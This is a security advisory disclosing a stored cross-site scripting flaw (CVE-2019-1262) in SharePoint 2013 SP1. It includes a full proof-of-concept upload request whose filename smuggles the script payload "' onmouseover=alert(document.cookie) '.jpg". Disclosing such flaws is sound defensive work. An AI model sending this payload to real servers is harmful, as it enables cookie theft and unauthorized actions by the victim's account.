Microsoft SharePoint 2013 SP1 Stored XSS Vulnerability Vendor: Microsoft Corporation Product web page: https://www.microsoft.com Affected version: 2013 SP1 Summary: SharePoint is a web-based collaborative platform that integrates with Microsoft Office. Launched in 2001, SharePoint is primarily sold as a document management and storage system, but the product is highly configurable and usage varies substantially among organizations. Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. Sharepoint 2013 SP1 allows users to upload files to the platform, but does not correctly sanitize the filename when the files are listed. An authenticated user that has the rights to upload files to the SharePoint platform, is able to exploit a Stored Cross-Site Scripting vulnerability in the filename. The filename is reflected in the attribute 'aria-label' of the following HTML tag. Tested on: Microsoft Windows Server 2016 Microsoft Sharepoint 2013 SP1 Vulnerability discovered by Davide Cioccia @zeroscience Advisory ID: ZSL-2019-5533 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262 CVE ID: CVE-2019-1262 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1262 -- PoC request: POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1 Host: vulnerable_sharepoint_2013 Connection: close Content-Length: 31337 Cache-Control: max-age=0 Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ== Origin: https://vulnerable_sharepoint_2013.tld Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Sec-Fetch-Mode: nested-navigate Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6 Cookie: ... ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_SelectedWpId" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_View" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_ShowSettings" False ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOGallery_SelectedLibrary" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOGallery_FilterString" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOTlPn_Button" none ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTTARGET" ctl00$PlaceHolderMain$ctl00$RptControls$btnOK ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName" Browse ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOWebPartPage_Shared" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOLayout_LayoutChanges" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOLayout_InDesignMode" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName" Browse ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing" false ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__REQUESTDIGEST" [DIGEST] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__VIEWSTATE" [VIEWSTATE] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" E6912F23 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__SCROLLPOSITIONX" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__SCROLLPOSITIONY" 0 ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="__EVENTVALIDATION" ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="destination" [DESTINATION_FOLDER] ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg" Content-Type: image/jpeg ZSL ------WebKitFormBoundaryewNI1MC6qaHDB50n Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle" on ------WebKitFormBoundaryewNI1MC6qaHDB50n--